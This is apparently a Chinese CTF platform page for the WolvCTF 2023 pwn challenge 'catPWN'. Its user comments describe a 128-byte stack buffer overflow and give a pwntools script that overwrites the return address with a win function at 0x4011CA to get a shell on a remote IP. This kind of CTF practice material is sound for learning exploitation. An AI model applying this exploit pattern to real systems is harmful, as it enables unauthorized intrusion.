catPWN 未解决

分数: 0 金币: 0
所属赛事: WolvCTF 2023
题目作者: 未知
一  血: zhangqr
一血奖励: 0金币
解  决: 47
提  示:
描  述:
wctf{}
其  他: 下载
评论
13536169969 1月前

用乌班图,好吧

回复 0

nil126 7月前

ida中打开,64位的程序,发现一个128长度的buffer有堆栈溢出漏洞;还有一个win函数,里面有一条执行/bin/sh的指令,指令地址是0x4011CA。接下来要做的就是构造一个128+8+8字节长度的payload,128字节填充buffer,8字节填充执行gets时压栈的buffer指针,最后8字节写int64(0x4011CA)即下条指令位置。 调用gets时堆栈状态: |----

回复 1

dongwenjia 1年前

这题真恶心,要不是kali报错,我都不知道我pwn进去了,打通之后ls查看没内容,必须cat flag,什么都没显示出来后,在输入ls才看到flag,我真服了,还不是根目录。

回复 2
怪我喽 1年前

哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈

回复 0

怪我喽 1年前

from pwn import* io = remote('82.157.146.43',?) payload=b'p'*0x88+p64(0x4011CA) io.send(payload) io.interactive() 用这个程序肯定没问题,就看你在kali中怎么执行操作了。这题真勾八

回复 3

WriteUp

暂无相关WriteUp

评分(0)

暂无评分

解题动态

fyut 攻破了该题 6小时前
花落时相遇 攻破了该题 9天前
keylin 攻破了该题 16天前
19526226356 攻破了该题 23天前
sigmas 攻破了该题 1月前
king123 攻破了该题 1月前
LL2003 攻破了该题 1月前
梦游的小狐狸 攻破了该题 1月前
13536169969 攻破了该题 1月前
shuanghu 攻破了该题 1月前
EtHat 攻破了该题 4月前
sumql 攻破了该题 4月前
0x00dream 攻破了该题 5月前
hanzj 攻破了该题 5月前
t1tl3d 攻破了该题 5月前
倦鸟叫了一整天 攻破了该题 5月前
fanshaoze 攻破了该题 5月前
jhinjax 攻破了该题 6月前
Rahn 攻破了该题 6月前
oceanpeak 攻破了该题 6月前
问题反馈